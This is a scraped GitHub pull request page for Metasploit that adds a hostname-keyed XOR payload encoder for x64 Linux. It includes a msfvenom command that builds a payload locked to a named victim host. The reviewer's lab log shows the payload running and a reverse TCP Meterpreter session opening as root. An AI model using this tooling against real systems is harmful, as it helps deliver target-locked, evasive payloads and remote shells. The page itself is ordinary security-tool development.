Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit) #12033

Merged
merged 1 commit into from
Jul 23, 2019
Merged

Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit) #12033

merged 1 commit into from
Jul 23, 2019

Conversation

osospeed
Copy link
Contributor

@osospeed osospeed commented Jul 1, 2019

xor_context

Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit).

How to

  • Copy the file xor_context.rb to the encoders folder : /opt/metasploit/modules/encoders/x64/xor_context.rb
  • You can use the module inside Metasploit or msfvenom :
    msfvenom --platform linux -p linux/x64/exec cmd='ls -la' -e x64/xor_context C_HOSTNAME=victimpc -f elf -o test
  • This resulting file will work only on machines having 'victimpc' as hostname.

@osospeed osospeed mentioned this pull request Jul 1, 2019
Closed
@wvu wvu added the feature label Jul 1, 2019
@wvu wvu self-assigned this Jul 15, 2019
@wvu wvu changed the title Create xor_context.rb Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit). Jul 16, 2019
@wvu wvu changed the title Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit). Metasploit context-keyed payload encoder based on hostname (linux, intel, 64 bit) Jul 18, 2019
@wvu
Copy link
Contributor

wvu commented Jul 23, 2019
edited
Loading 

root@ubuntu-xenial:/vagrant# ./test
total 60
drwxr-xr-x  1 vagrant vagrant   192 Jul 23  2019 .
drwxr-xr-x 24 root    root     4096 Jul 23 06:57 ..
drwxr-xr-x  1 vagrant vagrant   128 Jul 23 06:57 .vagrant
-rw-r--r--  1 vagrant vagrant  3013 Jul 23 06:57 Vagrantfile
-rwxr-xr-x  1 vagrant vagrant   210 Jul 23 07:06 test
-rw-------  1 vagrant vagrant 48164 Jul 23 06:57 ubuntu-xenial-16.04-cloudimg-console.log
root@ubuntu-xenial:/vagrant# hostname unbantos
root@ubuntu-xenial:/vagrant# ./test
Segmentation fault (core dumped)
root@ubuntu-xenial:/vagrant# hostname ubuntu-xenial
root@ubuntu-xenial:/vagrant# ./test
total 60
drwxr-xr-x  1 vagrant vagrant   192 Jul 23 07:07 .
drwxr-xr-x 24 root    root     4096 Jul 23 06:57 ..
drwxr-xr-x  1 vagrant vagrant   128 Jul 23 06:57 .vagrant
-rw-r--r--  1 vagrant vagrant  3013 Jul 23 06:57 Vagrantfile
-rwxr-xr-x  1 vagrant vagrant   210 Jul 23 07:06 test
-rw-------  1 vagrant vagrant 48164 Jul 23 06:57 ubuntu-xenial-16.04-cloudimg-console.log
root@ubuntu-xenial:/vagrant#

root@ubuntu-xenial:/vagrant# ./meterpreter

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58370) at 2019-07-23 02:11:53 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

root@ubuntu-xenial:/vagrant# hostname ubunutos
root@ubuntu-xenial:/vagrant# ./meterpreter
Segmentation fault (core dumped)
root@ubuntu-xenial:/vagrant#

@wvu wvu merged commit 51fe618 into rapid7:master Jul 23, 2019
wvu added a commit that referenced this pull request Jul 23, 2019
@wvu
Land #12033, xor_context hostname-keyed encoder
65bdd53
@wvu
Copy link
Contributor

wvu commented Jul 23, 2019
edited by tdoan-r7
Loading

Release Notes

A hostname-keyed encoder for x64 Linux payloads is now available.

msjenkins-r7 pushed a commit that referenced this pull request Jul 23, 2019
@wvu @msjenkins-r7
Land #12033, xor_context hostname-keyed encoder
2559917
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Aug 6, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
feature rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@osospeed @wvu @tdoan-r7